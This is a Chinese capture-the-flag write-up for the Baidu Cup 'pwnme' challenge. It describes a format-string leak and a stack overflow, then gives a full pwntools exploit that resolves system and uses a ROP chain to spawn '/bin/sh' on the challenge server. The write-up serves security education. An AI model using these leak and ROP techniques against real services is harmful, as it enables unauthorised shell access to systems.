十一月百度杯pwnme 详细wp

程序基本信息

可以看到开启了栈不可执行和got表不可写保护。

程序溢出点

在函数sub_400AF7中,v8可以读入0x12C个字节,同时if判断中对v8进行字节截断,所以我们可以输入如0x101个字符,在保证能够溢出到返回地址的同时,v8字节截断后的0x01又能够通过if判断,然后通过函数sub_400A90进行溢出。

函数sub_400AD1中存在格式化字符串漏洞,我们可以通过这个漏洞泄露任意地址的内容,并通过DynELF类获得system函数的地址。

整体思路

这个程序首先让你输入username跟password,然后提供三个选项

溢出漏洞位于选项2中,格式化漏洞在选项1中。
我们在输入完username和password后,首先进入选项2中,然后构造合适的payload,然后让程序调用选项1能够泄露任意地址的内容,从而可以通过DynELF类获取sytem地址。
然后让程序进入选项2中,构造能够溢出并绕过if的payload,通过ROP技术调用read函数输入/bin/sh并调用sytem函数完成system('/bin/sh')pwn掉程序。

exp脚本

from pwn import *

io = remote('106.75.2.53',10006)

io.recvuntil('Input your username(max lenth:40): \n')
io.sendline('asd')                                                  #输入username
io.recvuntil('Input your password(max lenth:40): \n')
io.sendline('1')                                                      #输入password

def leak(addr):
    io.recvuntil('>')
    io.sendline('2')
    io.recvuntil('please input new username(max lenth:20): \n')
    io.sendline('BBBBB') #输入任意大于0小于0x20个字符
    io.recvuntil('please input new password(max lenth:20): \n')
    payload1 = '%12$s'                                      #64位前六个参数用寄存器传参,6个以后用栈传参,需要泄露内容  
#的地址在rsp下6位处,所以printf取第(6+7)个参数
    payload1 += 'aaaaaaa'  #padding                 #使地址处在第13个参数处
    payload1 += p64(addr) 
    io.send(payload1)
    io.recvuntil('>')
    io.sendline('1')
    content = io.recvuntil('aaaaaaa')                   #读取对应地址泄露的内容
    # log.info("%#x -> %s" %(addr, (content or '').encode('hex')))
    if len(content) == 13:                                    #前面5个B,并且在栈中以0x0A结尾,也就是6个字节,后面7个a,
#一共13个字节,说明没有内容泄露
         return '\x00'
    else:
        return content[6:-7]                                   #返回泄露的内容

d = DynELF(leak,elf = ELF('./pwnme'))
system_addr = d.lookup('system','libc')            #获取system函数在内存中的位置
log.info('system_addr:%#x' % system_addr)

io.recvuntil('>')
io.sendline('2')
io.recvuntil('please input new username(max lenth:20): \n')
io.sendline('A')                                                  #输入任意大于0小于0x20个字符
io.recvuntil('please input new password(max lenth:20): \n')

pop_rdi_addr = 0x400ed3                                 #pop rdi;ret
pop_5_addr = 0x400ecb                                   #pop rbp;pop r12;pop r13;pop r14;pop r15;ret
read_got = 0x601FC8                                       #read函数got表地址
bin_sh_addr = 0x602010                                  #/bin/sh写入地址,在bss段中
mov_3_addr = 0x400EB0                        #mov rdx,r13;mov rsi,r14;mov edi,r15d; call qword ptr [r12 + rbx*8];add rbx,1;
cmp rbx,rbp;jnz short loc_400eb0

payload = ''
payload +='A' * 0x28                                          #padding 0x20个字节到栈底,加8溢出程序
payload += p64(pop_5_addr) 
payload += p64(0x1)                                          # rbp = 1,由于在mov_3_addr代码段有命令cmp rbx,rbp,jnz short loc_400eb0;rbx为0并且执行了add rbx,1指令,所以将rbp置1防止程序跳转发生错误
payload += p64(read_got)                                  # r12 = read函数got表地址
payload += p64(0x8) #r13 = 0x8
payload += p64(bin_sh_addr)                            #r14 = /bin/sh地址
payload += p64(0) #r15 = 0
payload += p64(mov_3_addr)                           #rdx = 0x8,rsi = /bin/sh地址,edi = 0,这段代码相当于read(0,/bin/sh地址,0x8)
payload += p64(0x8) * 7                                    #运行完mov_3_addr指令后接下来有add rsp,8和6个pop才到ret,用7个p64(0x8)滑过这段代码到ret
payload += p64(pop_rdi_addr)
payload += p64(bin_sh_addr)                           #rdi  = /bin/sh地址
payload += p64(system_addr)                          #system('bin/sh')
payload = payload.ljust(0x101,'A')                    #填充到0x101个字节绕过if

io.sendline(payload)
io.sendline('/bin/sh\x00')                                   #输入/bin/sh
io.sendline('cat flag')                                         #由于交互一会就会中断,所以直接发送命令获得flag
io.interactive()





成功获得flag

参考

百度杯十一月场 pwnme

posted @ 2019-09-22 22:43  PwnKi  阅读(853)  评论(0编辑  收藏  举报